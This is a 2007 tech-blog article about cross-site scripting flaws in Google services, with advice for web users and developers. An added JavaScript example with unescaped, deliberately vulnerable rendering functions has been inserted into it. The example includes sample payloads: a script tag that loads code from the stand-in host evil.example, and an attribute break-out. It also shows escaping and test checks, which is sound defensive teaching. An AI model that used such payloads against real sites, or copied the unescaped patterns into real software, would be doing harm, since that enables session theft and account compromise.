Google's in the XSS Crosshairs - and So Are You
Created 2007-09-24 21:32

Posted 09/24/07 at 11:32:52 PM | by Mark Soper

It's a commonplace that online security threats are aimed at the biggest target available. In terms of operating systems, that's still Microsoft. But if you consider how people actually use the Internet, think G - G for Google, that is.

According to The Register (theregister.co.uk, motto "biting the hand that feeds IT"), Google's Gmail web-based email, Picasa picture organizer, and embedded search appliance (used by websites that incorporate Google Search) have recently been proven vulnerable to cross-site scripting (XSS) exploits.

Web Info Pirates Fly the XSS Flag

XSS takes advantage of the fact that JavaScript, HTML, VBScript, ActiveX, and Flash scripts are commonly used in websites. Put simply, an XSS attack (exploit) gets a malicious script embedded into a dynamic web page; when a visitor's browser runs that page, the script captures or manipulates information as the attacker desires. This type of threat isn't new: the XSS FAQ at cgisecurity.com (linked below) goes back to 2003. What's scary about XSS exploits is that they threaten the very richness of the Internet. I remember when websites were almost all text with just the occasional photo or drawing. Today's web user wants more - and unfortunately, that makes XSS attacks more common.
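The paragraph above describes the mechanism in a sentence; the following added example (not code from the article, and not Google's code) shows it concretely for a server-rendered page: a fragment that drops untrusted input straight into HTML, the same fragment with HTML encoding applied, and two small checks a developer can run in tests to catch the difference. The page fragments, function names, the sample inputs and the host name evil.example are all constructed for the example.

```javascript
// Added example for this article (not the article's or Google's code):
// a vulnerable server-rendered fragment beside its hardened form, plus
// two checks a site developer can run in tests. All names are constructed.

// Vulnerable: untrusted input is concatenated straight into HTML, so a value
// that contains markup becomes live markup in the visitor's browser.
function renderGreetingUnsafe(name) {
  return '<p>Hello, ' + name + '!</p>';
}

// Vulnerable in attribute context: a double quote in the input closes the
// value attribute, and whatever follows is parsed as further attributes.
function renderSearchBoxUnsafe(query) {
  return '<input type="text" name="q" value="' + query + '">';
}

// Hardened: encode the five characters that carry meaning in HTML text and
// in quoted attribute values, so the browser shows them as literal text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderGreetingSafe(name) {
  return '<p>Hello, ' + escapeHtml(name) + '!</p>';
}

function renderSearchBoxSafe(query) {
  return '<input type="text" name="q" value="' + escapeHtml(query) + '">';
}

// Check 1: which tag names does the rendered fragment contain? A greeting
// should only ever contain the tags the template itself wrote.
function tagNames(html) {
  const names = new Set();
  const re = /<\s*\/?\s*([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) names.add(m[1].toLowerCase());
  return [...names].sort();
}

// Check 2: does an untrusted value that contains HTML-significant characters
// appear verbatim in the output? If so, it was reflected without encoding.
function reflectsUnencoded(html, untrusted) {
  if (!/[<>"'&]/.test(untrusted)) return false; // nothing that needed encoding
  return html.includes(untrusted);
}

// Constructed sample inputs of the kind the article describes: a script tag
// that loads code from an attacker-controlled host, and an attribute break-out.
const SCRIPT_INPUT = 'Bob<script src="//evil.example/x.js"></script>';
const ATTRIBUTE_INPUT = '" onfocus="run()';

// Runs both fragments through both checks and returns the results.
function demo() {
  return {
    unsafeTags: tagNames(renderGreetingUnsafe(SCRIPT_INPUT)),     // ['p', 'script']
    safeTags: tagNames(renderGreetingSafe(SCRIPT_INPUT)),         // ['p']
    unsafeReflects: reflectsUnencoded(
      renderSearchBoxUnsafe(ATTRIBUTE_INPUT), ATTRIBUTE_INPUT),   // true
    safeReflects: reflectsUnencoded(
      renderSearchBoxSafe(ATTRIBUTE_INPUT), ATTRIBUTE_INPUT),     // false
  };
}

console.log(demo());
```

The point of the two checks is that encoding must match the context the value lands in: the tag-name check catches the element-context case, while the verbatim-reflection check also catches the attribute case, where no new tag appears but a stray quote still lets extra attributes in. Templating libraries that encode by default do the same job as `escapeHtml` here; the risk in the article's examples is code that bypasses that encoding.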

What XSS Can Do to You

In the case of the most recent Google XSS problems, the vulnerabilities could be used to steal cookies, steal photos from Picasa and contacts from a Gmail account, and redirect Gmail messages to an account of the attacker's choosing. Although Google has taken action to block these attacks, this is just the latest round of XSS-based vulnerabilities suffered by Google - and others. For example, the Samy (aka J.S. Spacehero) virus used XSS to infect over a million MySpace users' pages in 2005, and a May 2007 ranking of websites with XSS vulnerabilities (linked below) lists many major sites, including Flickr, Photobucket, Yahoo! and many others.

Stopping XSS - If You Can

The ultimate solution to XSS vulnerabilities would be to disable all scripts; unfortunately, on today's Internet, such a move would also disable most commercial websites. Boring! So, what else can you do?

If you develop websites for fun or profit, consider scanning them for XSS vulnerabilities with a tool such as Acunetix Ltd's Web Vulnerability Scanner (a free version is available) or one of its competitors. This Google search (ironic, isn't it?) will turn up more examples.

But if you're an ordinary web user, not a developer, what are your options (other than disabling scripting, that is)?

1. If you use browser add-ons or other web-enabled products, install their updates as soon as they're available. As with Windows updates, browser add-on updates are often issued to improve security.

2. Keep in mind that any web-based service can be vulnerable to XSS.

3. XSS vulnerabilities are often cross-browser threats; using Firefox or Opera might not protect you.

4. Most XSS exploits also depend on old favorites like spoofing or getting you to click a link. As always, think before you click.

TAGS: phishing, XSS, cross site scripting, pharming, threat, exploit, browser
Future © 2008 Future US, Inc. All Rights Reserved.

Source URL: http://www.maximumpc.com/article/googles_in_the_xss_crosshairs_and_so_are_you

Links:
[1] http://www.theregister.co.uk
[2] http://www.theregister.co.uk/2007/09/24/google_vulns_put_users_at_risk/
[3] http://www.cgisecurity.com/articles/xss-faq.shtml
[4] http://www.sophos.com/virusinfo/analyses/jsspaceheroa.html
[5] http://hublog.hubmed.org/archives/001487.html
[6] http://www.acunetix.com/cross-site-scripting/scanner.htm
[7] http://www.google.com/search?q=XSS scanner&hl=en
[8] http://www.maximumpc.com/article/safer_browsing
[9] http://www.maximumpc.com/article/think_before_you_click_on_that_great_job_offer
[10] http://www.maximumpc.com/article/How-To--Protect-Yourself-from-Phishing-and-Pharming